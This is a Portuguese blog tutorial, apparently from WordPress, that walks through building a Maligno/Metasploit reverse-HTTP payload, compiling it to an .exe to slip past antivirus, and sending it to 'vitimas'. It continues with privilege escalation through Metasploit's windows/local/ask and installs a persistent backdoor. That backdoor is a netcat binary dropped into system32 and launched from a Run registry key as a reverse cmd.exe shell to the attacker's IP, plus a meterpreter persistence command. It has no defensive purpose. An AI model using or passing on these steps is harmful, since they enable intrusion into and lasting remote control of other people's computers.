EXPLOIT MALIGNO, BYPASS AV, PRIVILEGE ESCALATION, PERSISTENT NETCAT BACKDOOR

Comandos:
– Configurando Maligno
Primeiro faça o donwload do Maligno aqui: http://adf.ly/1Szd6C
$_ mv maligno-2.4 maligno
$_ chmod 777 maligno -R
$_ cd maligno
$_ sh install.sh
+ Country Name -> ENTER
+ State Name -> ENTER
+ Locality Name -> ENTER
+ Organozation Name -> ENTER
+ Common Name -> ENTER
+ Email Address -> ENTER
$_ nano server_config.xml
$_ python clientgen.py -f server_config.xml -s true
$_ python maligno_srv.py
– Iniciar o postgresql
$_ /etc/init.d/postgresql start
– Iniciar o msfconsole mais o resource.rc
$_ msfconsole -r ~/maligno/msfresources/0_standard_reverse_http_MY_IP_Port.rc -q
– Copiando o cliente.py para a compilação para exe
$_ cd maligno/clients
$_ cp standalone_0_standard_windows_reverse_http.py ~/PASTA_DESTINO/virus.py
Baixe os Arquivos usado no video:
4SHARED Link: http://adf.ly/1XkLC2
Instalando os arquivos nescessario para a compilação, desative o antivirus, principalmeete o avaste que fica barrando conexões de download, o qual usaremos para instalar alguns compoente para o python.
Instale o python2.7 de acordo com o video:
instale o VCForPython27 de acordo com o video:
— Donwload de VCForPython27 aqui: http://adf.ly/1Szkno
Se nescessario instale o pip de acordo com o video, pois ele é responsavel por o aplicativo easy_install.exe o qual usaremos para instalar a lib crypto e pycrypto.
– Instalando PyCrypto & Crypto com EasyInstall Abra o Prompt de Comando do windows:
Acesse a pasta c:\python27\scripts\
#> easy_install.exe crypyo
#> easy_install.exe pycrypto
– Instalado PIL.exe & PyCrypto.exe
Instale o progrma PIL-1.1.7.win32-py2.7.exe
Instale o prgrama pycrypto-26.win32-py27.exe
– Instalando Py2exe para compilação
Instale o programa py2exe-0.6.9.win32-py2.7.exe de acordo com o video:
copie a dll msvcp90.dll para apasta c:\python\
– Compilando .py para .exe
Baixe os aquivos para a compilação, Build-exe:
4SHARED Link: http://adf.ly/1Y59vK
– Abra o aquivo build.py e edite com suas variáveis
– Renomei o seu virus.py para main.py e copie para a pasta build-exe
Abra o prompt de comando do windows e acesse a pasta build-exe
#> cd C:\Users\USUARIO_WINDOWS\Desktop\build-exe
#> c:\python27\python.exe build.py py2exe
Envie para suas vitimas o seu arquivo.exe
– Privilege Escalation
Com uma sessão aberta execulte o comando
#_ meterpreter> background
#_ msf exploit > use exploit/windows/local/ask
#_ msf exploit > set LHOST seu_ip
#_ msf exploit > set LPORT sua_porta
#_ msf exploit > set SESSION numero_da_sua_sessão
#_ msf exploit > set FILENAME nome_que_quizer.exe
#_ msf exploit > run
– Persistent Netcat Backdoor
#_ meterpreter> upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32
#_ meterpreter> reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
#_ meterpreter> reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d ‘C:\windows\system32\nc.exe -d seu_ip 4477 -e cmd.exe’
#_ meterpreter> reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
Escultar a porta 4477
#_ nc -lvp
–  Persistent Backdoor
#_ meterpreter> run persistence -r SEU_IP -p PORTA -A -X -i 300

By  Moisés Oliver

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s